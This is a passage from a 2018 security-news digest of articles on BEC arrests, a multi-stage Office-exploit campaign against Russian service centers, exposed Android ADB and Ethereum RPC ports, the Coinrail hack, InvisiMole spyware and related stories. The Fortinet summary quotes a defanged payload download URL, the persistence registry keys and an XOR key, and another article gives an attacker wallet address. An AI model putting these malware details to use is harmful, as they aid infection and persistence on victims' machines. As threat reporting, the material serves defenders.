The government has also unveiled a 10,000-strong brigade to fight cybercrimes and "wrongful views" on the internet, according to state media reports.

The unit, dubbed Force 47, is also tasked with fighting anti-state propaganda on the web.


Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams
12.6.2018 securityaffairs BigBrothers

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.
On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months, 42 suspects have been arrested in the United States, 29 in Nigeria, the remaining in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to recover of roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.”

bec operation wirewire

During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. in one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

The analysis of losses caused by crimes reported in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) is prominent, followed by Confidence Fraud/Romance ($211,382,989), and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”


Crooks used multi-stage attacks aimed at Russian Service Centers
12.6.2018 securityaffairs BigBrothers

Fortinet recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.
Security researchers from Fortinet have recently spotted a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

Experts highlighted the hackers conducted multi-stage attacks but excluded the involvement of a nation-state actor.

Attackers leveraged spear-phishing messages using weaponized Office documents exploiting the 17-Year-Old MS Office flaw CVE-2017-11882 that was addressed by Microsoft updates in October.

The first attacks were observed at the end of March when crooks sent spear-phishing emails to a service company that repairs Samsung’s electronic devices.

The messages were written in Russian and contained a file named “Symptom_and_repair_code_list.xlsx”.

Russian service centers

“FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.” reads the post published by Fortinet.

“A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.”

Experts noticed that the content of the email was the result of a translation made by a translator service, analyzing the headers of the email the experts discovered that the IP address of the sender wasn’t associated with to the domain in the “From” field.

The attackers used a different XLSX file for each email, they used shellcode to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload.

“The two most important functions “imported” by the shellcode are: URLDownloadToFileW and ExpandEnvironmentStringsW.” continues the analysis.

“The purpose of the first one is obvious. The last function is used to determine the exact location where the shellcode should store downloaded payload, since this location will be different under different platforms. Finally, Shellcode downloads a file from the URL: hxxp://brrange.com/imm.exe, stores it in %APPDATA%server.exe, and then tries to execute it.”

The final payload uses multiple-layer multi-packer protection to avoid detection.

The first stage implements the first layer of protection, the popular ConfuserEx packer that obfuscates objects names, as well as names of methods and resources,

The resources are used to determine the next stage payload, which is encrypted using DES, and executes the decrypted file named BootstrapCS that represents the second stage of the multi-layer protection.

BootstrapCS is not obfuscated, but it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This check is essential to avoid the code being execute in a virtualized environment and also searches for and shuts dowIt also writes the payload path to the following startup registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
The stage 3 of the payload is represented by a binary resource named mainfile that represents the third level of packing protection, a simple XOR algorithm with the KEY = 0x20 was used for encryption.

Once the payload is decrypted payload it is injected into a process based on the value in the settings resource file.

The stage 3 of the payload resolves a commercial Remote Administration Tool (RAT) dubbed Imminent Monitor. At stage 4, the security researchers once again used the ConfuserEx packer.

The Imminent Monitor RAT includes the following five modules:

Aforge.Video.DirectShow 2.2.5.0
Aforge.Video 2.2.5.0
Injector 1.0.0.0
ClientPlugin 1.0.0.0
LZLoader 1.0.0.0
that allows the malicious code to control the victim’s machine, including the webcam.

The analysis of the C&C servers revealed 50 domains registered by the attackers on the same day, some of them were used by crooks to deliver malware, while others were involved in phishing attacks. The experts also discovered older .XLSX samples that exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” concludes Fortinet.

Further details are included in the IoCs section of the report.


Multi-Stage Attacks Target Service Centers in Russia

11.6.2018 securityweek   BigBrothers

Fortinet security researchers recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The attacks stand out because of their multi-staging and are believed to have been launched by a non-Russian actor. The attackers used spear-phishing emails and malicious Office documents exploiting CVE-2017-11882, a 17 years old vulnerability in Office’s Equation Editor that Microsoft manually patched in October last year.

The targeted attack started at the end of March with spear-phishing emails received at a service company that repairs Samsung’s electronic devices. Pretending to come from representatives of Samsung, the emails specifically targeted this organization, were written in Russian, and contained a file named Symptom_and_repair_code_list.xlsx, related to the targeted company’s profile.

The emails were likely the result of machine translation, instead of being created by a native Russian speaker, the security researchers reveal. Furthermore, the headers of the email revealed that the IP address of the sender wasn’t related to the domain in the “From” field.

The attackers used different attachments for each email, but all messages had seemingly legitimate .XLSX files attached. Furthermore, all of the documents contained an exploit for the CVE-2017-11882 vulnerability.

The shellcode used in the attacks was meant to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload. It also imports other functions, including one used to determine the exact location where the downloaded payload should be stored.

The payload features multiple-layer multi-packer protection, starting with an initial layer where the well-known ConfuserEx packer was used to obfuscate objects names, along with the names of methods and resources. From these resources, it reads the next stage payload, which is encrypted using DES, and executes the decrypted file.

The decrypted file, named BootstrapCS, is the second stage of the multi-layer protection. While not obfuscated, it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This stage can check for various emulation, sandbox, and virtual machine tools, and also searches for and shuts down specified processes, in addition to disabling system utilities. It also writes the payload path to startup registry keys, hides the file with system and hidden attributes, and injects the payload in various processes.

A binary resource named mainfile is the encrypted stage 3 of the payload. It is an executable that represents the third level of packing protection: a simple XOR algorithm with the KEY = 0x20 was used for encryption. The decrypted payload is injected into a process based on the value in the settings resource file.

The stage 3 of the payload references to a commercial Remote Administration Tool (RAT) called Imminent Monitor, which can be purchased by anyone, directly from the app developer (who apparently prohibits the malicious use of the program). At stage 4, the security researchers once again stumbled upon ConfuserEx.

The main payload of the attack, however, turned out to be the commercial version of the Imminent Monitor RAT, which includes five modules to record videos using the victim’s webcam, to spy on victims, and to control their machines.

The command and control (C&C) servers used in these attacks led the researchers to discover 50 domains registered on the same day, some of which were used to spread malware, while others for phishing attacks. The researchers also discovered older .XLSX samples that use the same C&C but attempt to exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” Fortinet concludes.


Industrial Cybersecurity Firm Claroty Raises $60 Million
11.6.2018 securityweek IT

New York-based industrial cybersecurity firm Claroty announced on Monday that it raised $60 million in a Series B funding round, bringing the total amount raised by the company to date to $93 million.

The funding round was led by Temasek, with participation from several industrial giants, including Rockwell Automation, Schneider Electric’s investment arm Aster Capital, and Siemens-backed venture capital firm Next47. Envision Ventures, Tekfen Ventures and original Claroty investors Bessemer Venture Partners, Innovation Endeavors, Team8, and ICV also contributed.

The company will use the new funds to further advance the technology powering its products, grow the Claroty brand, and extend global sales and customer support.

Claroty has been working with Rockwell Automation for nearly two years and in 2017 the companies announced that they had teamed up to combine their security products and services. Claroty also struck a deal last year with Schneider Electric to market its network monitoring solutions through Schneider’s Collaborative Automation Partner Program (CAPP).

Siemens has also entered a partnership with Claroty. A recently introduced anomaly detection capability added by Siemens to its service offering involves Claroty software running on Siemens hardware – initially on ruggedized PCs and, in the future, on switches.

Claroty was founded in 2014 and it emerged from stealth mode in 2016 with $32 million in funding. The company claims it has recorded a 300% year-over-year growth in bookings and customer base, which includes organizations all around the world in the electric utilities, oil and gas, chemical, manufacturing, mining, food and beverage, and real estate sectors.

Claroty’s ICS security platform continuously monitors operational technology (OT) networks in search of potential threats. The product enables organizations to control remote employee and third-party access to critical systems, and helps them create a detailed inventory of industrial network assets and identify configuration issues.

“Protecting the critical automation systems our customers operate against cyberattacks remains a top priority for the company,” said Frank Kulaszewicz, SVP, Architecture & Software at Rockwell Automation. “Claroty has been a partner since 2016 and their advanced technology is a key element of our real-time threat detection and monitoring service. Our investment in Claroty is a logical extension of our ongoing strategic partnership.”

“A perimeter defense to cybersecurity in today’s connected world is not enough. An end-to-end approach, with solutions that provide deep visibility into operational technology and industrial control systems, is critical for the security of heavy processing environments,” said Hervé Coureil, Chief Digital Officer at Schneider Electric. “Leading the digital transformation of energy management and automation, Schneider Electric takes cybersecurity very seriously and the partnership with Claroty complements the cybersecurity layer of our IoT-enabled EcoStruxure architecture.”


Many Android Devices Ship with ADB Enabled
11.6.2018 securityweek Android

Many vendors ship Android devices with the Android Debug Bridge (ADB) feature enabled, thus rendering them exposed to various attacks, security researcher Kevin Beaumont has discovered.

ADB is a feature meant to provide developers with the ability to easily communicate with devices remotely, to execute commands and fully control the device. Because it doesn’t require authentication, ADB allows anyone to connect to a device, install apps and execute commands.

In theory, the device should be first connected via USB to enable ADB, but Beaumont has discovered that some vendors ship Android devices with the feature enabled right from the start. The Debug Bridge listens on port 5555, and anyone can connect to the device over the Internet.

“During research for this article, we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition,” the security researcher notes.

This is clearly a major issue, as anyone can remotely access devices with ADB enabled and, without any password but with root privileges, can silently install software and execute malicious functions.

The issue is not related to ADB itself, as it wasn’t designed to be deployed in this manner, but with devices having the feature enabled. Furthermore, root access should not be available in non-development builds, but this can be bypassed on some devices, not to mention that some users enabled root on their own.

To make matters worse, the security researcher also discovered a worm taking advantage of this security slip and attempting to infect devices via ADB.

Starting February 1, there was a massive increase in scans for TCP port 5555 (the Android Debug Bridge port), with “nearly ten thousand unique IP addresses scanning in any 24 hour window.” There are over a hundred thousand IP addresses scanning each 30 days, but the security researcher couldn’t determine the exact number of infected devices.

“These devices are currently being used for cryptocurrency mining, where computing resources is misused without the owner’s permission to generate profits for criminals,” Beaumont notes.

Qihoo 360’s Netlab issued a warning on the matter on February 4, but the problem continued to grow, mostly in Asia.

Analysis of the worm revealed it is spreading using a modified version of Mirai’s code, leveraging the official Android ADB tools. It lacks a command and control (C&C) server and moves peer-to-peer via port 5555. Because of various bugs in its code, the malware only works on certain types of devices.

The issue, however, is larger than a simple botnet abusing devices for cryptocurrency mining. The fact that the impacted devices ship misconfigured is the actual problem, especially with some of them used in corporate environments.

“If somebody wanted to, they could run something other than cryptocurrency mining — which could develop into a serious issue,” Beaumont points out.

Searching for devices listening to port 5555 and filtering the results using Metasploit’s module adb_server_exec, the researcher discovered over 80,000 devices residing in China alone.

“It’s very clear through digging through data and feeds that a huge number of misconfigured devices exist, hence all the scanning for port 5555,” the researcher notes.

According to Beaumont, vendors should make sure they do not ship products with ADB enabled over a network, especially on devices designed to stay connected to the Internet, as these devices remain exposed and can be misused, while also placing users in harm’s way. Vendors are also advised to release updates to correct the issue.


Bitcoin Declines After Coinrail Cryptocurrency Exchange Hack
11.6.2018 securityweek Cryptocurrency

Another Bitcoin exchange has been hacked, strengthening concerns over the security of exchanges, and causing a further fall in the value of bitcoins.

Coinrail, a relatively small cryptocurrency exchange in South Korea (but still within the world's top 100 exchanges), confirmed an 'intrusion' over the weekend. On Sunday it tweeted, "There has been a cyber intrusion in our system. We're confirming it and some coins (Pundi X, NPXS) are confirmed."

Commenting on Twitter, @peatrykim claims, "The total hacked coins worth 50mil dollars." A South Korean news outlet, Yonhap, suggests that about 40 billion won ($37.28 million) worth of virtual coins were stolen.

Coinrail said that about 30% of its coins were stolen, but also claims to have blocked most of them before they could be cashed out by the hackers. The remaining 70% are now stored in a 'cold wallet' (that is, off-line) and are thought to be safe.

There is no information yet on how the hack was executed, nor who might have been involved. Coinrail is working with law enforcement.

A statement on its website (Google translation) says, "At present , 70% of your coin rail total coin / token reserves have been confirmed to be safely stored and moved to a cold wallet and are in storage. Two-thirds of the coins confirmed to have been leaked are covered by freezing / recalling through consultation with each coach and related exchanges. The remaining one-third of coins are being investigated with investigators, relevant exchanges and coin developers."

Bitcoin, Ethereum and Ripple, the world's largest cryptocurrencies, all declined approximately 5% or 6% over the weekend. Bitcoin has now declined almost 50% for the year, and approximately 65% from its all-time high in December 2017.

In January 2018, 14 South Korean exchanges adopted measures aimed at better protecting users. "Coinrail is not a member of the group that promotes self-regulation to enhance security," commented Kim Jin-Hwa of the Korea Blockchain Industry Association. "It is a minor player in the market and I can see how such small exchanges with lower standards on security level can be exposed to more risks."

F-Secure security expert Mikko Hypponen echoed this sentiment on Twitter. "We see this regularly. Attackers are moving on from traditional financial targets; from hacking online banks and online stores to hacking crypto exchanges and token wallets. This makes a lot of sense from the attacker's point of view," he tweeted. "Cryptocurrency exchanges are ideal targets for attackers. Small companies with a lot of money. Run by startups, with small security teams and no experience. And if you get in, the loot is already anonymized and untrackable."

Ilia Kolochenko, CEO and founder of web security company High-Tech Bridge, also commented on the incident.

"It's one more drop in the ocean of crypto-breaches and it's unlikely to drive any substantially new conclusions or concerns. This Bitcoin drop seems to be a temporary fluctuation, investors are now waiting for some good or bad news," Kolochenko said. "The emerging problem of Bitcoin is its extreme influenceability by third-parties. A well-prepared hacking campaign, targeting top Western media agencies, can virtually ruin Bitcoin after releasing fake news about major breaches and subsequent cryptocurrency ban by major countries. People playing short can make unprecedented profits, however, Bitcoin may ultimately never recover at the end of the day."


Critical Flaws Expose ABB Door Communication Systems to Attacks
11.6.2018 securityweek ICS

Researchers discovered several critical vulnerabilities in door communication systems made by Switzerland-based industrial tech company ABB. Both patches and workarounds have been made available by the vendor.

The vulnerable product is the ABB IP Gateway (also sold under the Busch-Jaeger brand), a component of ABB’s door communication solutions, which include audio and video intercoms, fingerprint readers, and access code keypads. The IP Gateway provides the connection between the intercom, the local network and the mobile application that can be used to remotely monitor and control the system. The company’s solutions are used by organizations around the world.

According to a security advisory published recently by ABB, researchers Maxim Rupp and Florian Grunow of ERNW discovered several potentially serious vulnerabilities in the IP Gateway running firmware versions 3.39 and prior.Vulnerabilities found in ABB IP Gateway

Grunow discovered a remote code injection flaw that allows an attacker with access to the local network to take control of the targeted device. The vulnerability affects the local configuration web server and it can be exploited by sending specially crafted messages to the system.

Rupp identified a total of three vulnerabilities. One of them, CVE-2017-7931, allows an attacker to bypass authentication and access configuration files and application pages on the web server simply by navigating to their associated URL.

Vulnerabilities found in ABB IP Gateway

According to an advisory published by ICS-CERT, which Rupp has described to SecurityWeek as accurate, the configuration files that can be accessed by exploiting this flaw can contain passwords stored in clear text, an issue tracked as CVE-2017-7933. ABB’s advisory claims plaintext passwords can be obtained by an attacker from the user’s browser cookies following a successful login.

Finally, ABB IP Gateway is affected by a cross-site request forgery (CSRF) bug, tracked as CVE-2017-7906, that allows an attacker to conduct various actions on behalf of a legitimate user. These types of attacks can be carried out remotely, but they typically require some user interaction (e.g. clicking on a link, visiting a malicious webpage).

ICS-CERT, whose advisory does not mention the issue identified by Grunow, has classified all the vulnerabilities as being critical or high severity.

ABB says it has patched the vulnerabilities with the release of firmware version 3.40. The company has also provided workarounds and noted that attacks can be mitigated by using security best practices for protecting a network against external attacks. The most important recommendation is that users ensure the web server cannot be accessed directly from the Internet.

The vendor is not aware of any attempts to exploit these vulnerabilities in the wild and noted that details of the security holes have not been made public.


Experts warn hackers have already stolen over $20 Million from Ethereum clients exposing interface on port 8545

11.6.2018 securityaffairs  CyberCrime

Cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000, from clients exposing the unsecured interface on port 8545.
Cybercriminals have raked over 20 million dollars in the past few months by hijacking poorly configured Ethereum nodes exposed online are continuing their operations.

In March, security experts from Qihoo 360 Netlab reported a hacking campaign aimed at Ethereum nodes exposed online, crooks were scanning for port 8545 to find wallets that exposed their JSON-RPC.

According to the researchers, the cybercrime gang stole 3.96234 Ether (between $2,000 and $3,000)., but currently, they have tracked another criminal gang that already stolen an amazing amount of funds that are available in their wallets.

Researchers claim the cybercriminal group has managed to steal a total of 38,642 Ether, worth more than $20,500,000.

360 Netlab
@360Netlab
Remember this old twitter we posted? Guess how much these guys have in their wallets? Check out this wallet address https://www.etherchain.org/account/0x957cd4ff9b3894fc78b5134a8dc72b032ffbc464#transactions … $20,526,348.76, yes, you read it right, more then 20 Million US dollars https://twitter.com/360Netlab/status/974374944711815168 …

8:48 AM - Jun 11, 2018
132
107 people are talking about this
Twitter Ads info and privacy
“If you have honeypot running on port 8545, you should be able to see the requests in the payload, which has the wallet addresses,” states Qihoo 360 Netlab team. “And there are quite a few IPs scanning heavily on this port now.”

Geth is a popular client for running Ethereum node allowing users to manage them remotely through the JSON-RPC interface.

Developers can use this programmatic API to build applications that can retrieve private keys, transfer funds, or retrieve personal details of the owner of the wallet.

The hackers moved stolen funds to the Ethereum account having the address 0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464.
Ethereum port 8545
The good news is that the JSON-RPC interface comes disabled by default in most apps.

In May 2018, crooks used the Mirai-based Satori botnet to scan the Internet for Ethereum mining software that were left accidentally left exposed online.

Unfortunately there are several groups that are actively scanning the Internet for insecure JSON-RPC interface to steal funds from unsecured cryptocurrency wallets.

Development team have to secure their applications by only allowing connections to the geth client originating from the local computer, another alternative consists in the implementation of authentication mechanism for remote RPC connections.

Experts believe the hackers will increase their scanning for port 8545 also thanks the availability online of tools that automate the process.


Former GCHQ chief Hannigan warns of Russia’s aggressive approach to the cyberspace

11.6.2018 securityaffairs  BigBrothers

According to former GCHQ chief, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.
Former GCHQ chief Robert Hannigan has warned that the availability of hacking tools in the main marketplaces is rapidly changing the threat landscape. Hannigan served as the director of the UK intelligence agency between November 2014 until January 2017.

Threat actors have an easy access to attack tools even without having specific knowledge.

Hannigan spoke had a keynote speech titled “Weaponising the web: Nation-state hacking and what it means for enterprise cybersecurity” at the Infosec conference in London last week.

Hannigan highlighted the risks associated with the operation conducted by nation-state actors that had dramatically increased over the last five years.

State-sponsored hackers pose a serious risk for enterprises as well as governments, the former GCHQ chief warned of Government APT group using crime gangs as a proxy machine hard the attribution.

“Nation state attacks using criminal group as a proxy” is a “fairly new issue.” Hacking tools are becoming a commodity for threat actors and represent problem companies.

Hannigan mentioned the activity conducted by North Korea-linked APT and Iranian state-sponsored hackers.

North Korean APT groups, like the infamous Lazarus APT crew, focused its activity on SWIFT network as well as crypto exchanges to steal funds.

“This is a rational state pursuing rational objectives,” explained Hannigan.

Hannigan warned of the intensification of the Iranian hackers that also targeted financial institutions.

Which is the greatest threat?

Russia, of course! Russia-linked APT groups are very sophistication and continuously target infrastructure worldwide. in some cases they demonstrated destructive abilities, like the attacks against the Ukrainian power grid.

Russia

According to Hannigan, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.

“It’s unclear if that was a mistake or an experiment,” Hannigan said. “Russia seems to be live testing things in cyber, as it has been [on the ground] in Syria, but it’s a doctrine we don’t fully understand.”

The former spy chief highlighted the risks associated with state-sponsored malware like WannaCry that caused billion dollars damages to organizations worldwide and severe problems to critical infrastructures, like hospitals in the UK.

“The problem is that the risk of miscalculation is huge,” Hannigan warned.


South Korean Cryptocurrency Exchange Coinrail hacked, hackers stole over $40M worth of ICO tokens
11.6.2018 securityaffairs  Cryptocurrency

Cryptocurrency Exchange continues to be a privileged target for hackers, news of the day is the hack of the South Korean exchange Coinrail.
The hack has happened during the weekend, on Sunday Coinrail announced the cyberheist. Attackers stole over $40M worth of ICO tokens that were maintained in the servers of the exchange.

The company published a data breach notification on its website that currently appears in maintenance mode.

coinrail
@Coinrail_Korea
해킹공격시도로 인한 시스템 점검중입니다. 일부코인(펀디엑스,NPXS)이 확인되었으며 추가적인 코인피해가 있는지 여부를 확인중입니다. 추후 자세한 사항은 재공지하겠습니다 / There has been an cyber intrusion in our system. We're confirming it and some coins(Pundi X, NPXS) are confirmed.

5:19 AM - Jun 10, 2018
45
63 people are talking about this
Twitter Ads info and privacy
The exchange explained that attackers stole tokens issued during the initial coin offerings (ICOs) of Pundi X (NPXS), NPER (NPER), and Aston (ATX).

“Most notably, the hackers got away with $19.5 million-worth of NPXS tokens that were issued by payment project Pundi X’s ICO. Added to that they scored a further $13.8 million from Aston X, an ICO project building a platform to decentralize documents, $5.8 million in tokens for Dent, a mobile data ICO, and over $1.1 million Tron, a much-hyped project originating from China.” reported TechCrunch.

“That’s according to a wallet address that has been identified as belonging to the alleged attacker, who also got hold of smaller volumes of a further five tokens from Coinrail.”

South Korea is one of the countries with the highest cryptocurrency trading activity, but Coinrail is one of its smaller exchanges operating over there.

According to coinmarketcap.com, the South Korean exchange ranks in world’s top 90 based on trading volume.

After the discovery of the hack, Coinrail immediately put offline its wallets to secure its cryptocurrency assets, it is currently working with the affected ICO companies to freeze the stolen funds.

exchange coinrail hack

Coinrail asked other cryptocurrency exchanges to freeze some of the attacker’s addresses where the coins where transferred.

At the time there is no news about possible compensation for the customers of the exchange, recently Japan’s Coincheck refunded its customers following a cyberheist.


InvisiMole Spyware is a powerful malware that went undetected for at least five years
11.6.2018 securityaffairs  
Virus

Malware researchers from ESET have spotted a new sophisticated piece of spyware, tracked as InvisiMole, used in targeted attacks in Russia and Ukraine in the last five years.
Experts still haven’t attributed the malware to any threat actor, InvisiMole could be a nation-state malware developed for cyber espionage purpose or the result of a development of a financially-motivated group.

The researchers have discovered only a few dozen samples in the wild, the malicious code implements a broad range of features thanks it modular architecture that make the threat very versatile.

“Our telemetry indicates that the malicious actors behind this malware have been active at least since 2013, yet the cyber-espionage tool was never analyzed nor detected until discovered by ESET products on compromised computers in Ukraine and Russia.” reads the report published by ESET.“The campaign is highly targeted – no wonder the malware has a low infection ratio, with only a few dozen computers being affected.”

At the time the experts still haven’t discovered the attack vector and there is no info about the types of campaigns in which it was involved.

Experts don’t exclude any infection vector, including installation facilitated by physical access to the machine.

The modular structure of the InvisiMole spyware is composed of a wrapper DLL that leverages two other backdoor modules that are embedded in its resources to conduct its activities.

InvisiMole spyware

According to the researchers, the authors of the InvisiMole spyware have removed any clue that could attribute the malware to a specific actor, the unique exception is represented by the compilation data of a single file (dating to October 13, 2013). Compilation dates for all the remaining files have been removed by the authors.

The main module is called RC2FM and supports 15 commands that allow the attacker to search and exfiltrate data from the infected system.

The RC2FM supports commands for gathering system information and performing simple changes on the system, it also includes spyware features like the control of the microphone and user’s webcam.

The second module, dubbed RC2CL, is greater and more advanced than RC2FM, it is able to extract proxy settings from browsers and use those configurations to send data to the C&C server in the presence of a proxy.

“This module communicates with C&C servers that are either hardcoded in the sample, or updated later by the attackers.” continues the analysis.

“Moreover, the module is able to reach out to the C&C servers even if there is a proxy configured on the infected computer. If a direct connection is unsuccessful, the module attempts to connect to any of its C&C servers using locally-configured proxies or proxies configured for various browsers (Firefox, Pale Moon, and Opera).”

The RC2CL module supports 84 backdoor commands and implements almost all the spyware capabilities, including the ability to run remote shell commands, registry key manipulation, file execution, getting a list of local apps, loading drivers, getting network information, disabling UAC, and turning off the Windows firewall.

RC2CL can also record audio via the microphone and take screenshots via the webcam, in the same way the InvisiMole spyware can do with the first module.

The RC2CL module also implements a safe-delete feature to avoid forensic investigation.

“Another example of how the malware authors attempt to act covertly is the way they treat traces left on the disk. The malware collects loads of sensitive data, which are then temporarily stored in files and deleted after they have been successfully uploaded to the C&C servers.Even the deleted files can, however, be recovered by an experienced system administrator, which could help further investigation of the attack – after the victim becomes aware of it.“continues the report.

“This is possible due to the fact that some data still reside on a disk even after a file is deleted. To prevent this, the malware has the ability to safe-delete all the files, which means it first overwrites the data in a file with zeroes or random bytes, and only then is the file deleted.”

The full list of IoCs related to the threat can be found on GitHub.


Search Engines in Russia cannot link to banned VPN services and Internet proxy services
10.6.2018 securityaffairs BigBrothers 

Russia strengthens online censorship by announcing fines for search engines that link to VPN serviced banned in the country.
Russian Government has approved a new bill to punish search engines that are not aligned with Moscow and that allows its users to find VPN services, and anonymization tools that allow circumventing the censorship.

According to the amendments to the Code of Administrative Offenses of the Russian Federation, Duma will also impose fines on search engines if they will continue to provide results about queries on an up-to-date database of blocked domains upon users’ request.

Fines for individuals will range between 3,000 and 5,000 rubles (roughly $48 to $80), while officials will face fines up to 50,000 rubles (roughly $800), and legal entities will face fines between 500,000 to 700,000 (roughly $8,019 to $11,227).

“The failure of the operator to perform the search system to connect to this system “entails the imposition of an administrative fine on citizens in the amount of three thousand to five thousand rubles; on officials – from thirty thousand to fifty thousand rubles; on legal entities – from five hundred thousand to seven hundred thousand rubles, “- reads the press release published by the Duma.

Russians ordinary use VPN services and other anonymizing services to access blocked content and bypass censorship, in the following graph we can see the continuous growth for the number of Tor users in Russia.

Search Engines Tor User VPN Russia

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the Government regularity authority.

Since May 3rd, 2018, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

However, many VPNs and Internet proxy services still haven’t complained about the country law by registering themselves, for this reason, Moscow introduced fines for search engines.

The Russian communications watchdog Roskomnadzor will also provide a Federal State Information System (FGIS) containing the list of banned websites and services in the country, and search engines will need to update the results they provide by connecting to FGIS.

Search engines have 30 days to be aligned with Federal State Information System (FGIS) if the service providers

Those who fail to connect to this system will also face fines similar to those detailed above.

In May, the Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.


Chinese state-sponsored hackers steal 600GB U.S. Navy data
9.6.2018 securityaffairs BigBrothers 

According to a report published by The Washington Post, Chinese hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor.
China-linked hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor, the Washington Post reported Friday. The threat actors stole more than 614 gigabytes of data including secret plans to develop a new type of submarine-launched anti-ship missile.

The Washington Post was informed by government officials that spoke on the condition of anonymity.

According to the Washington Post, the security breach took place in January and February, the hackers belong to a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The report published by the media outlet doesn’t reveal the name of the U.S. Navy contractor, it only reports that works for the Naval Undersea Warfare Center, based in Newport, Rhode Island.

“Chinese government hackers have compromised the computers of a Navy contractor, stealing massive amounts of highly sensitive data related to undersea warfare — including secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020, according to American officials.” states the report published by the Washington Post.

“The hackers targeted a contractor who works for the Naval Undersea Warfare Center, a military organization headquartered in Newport, R.I., that conducts research and development for submarines and underwater weaponry.”

Stolen data included unclassified information relating to submarine cryptographic systems, signals and sensor data, and a project called Sea Dragon.

The project Sea Dragon was launched by the Pentagon to extend existing US military technologies for new applications, the US Government already spent more than $300 million for the initiative since 2015.

“The Defense Department, citing classification levels, has released little information about Sea Dragon other than to say that it will introduce a “disruptive offensive capability” by “integrating an existing weapon system with an existing Navy platform.” continues the post.

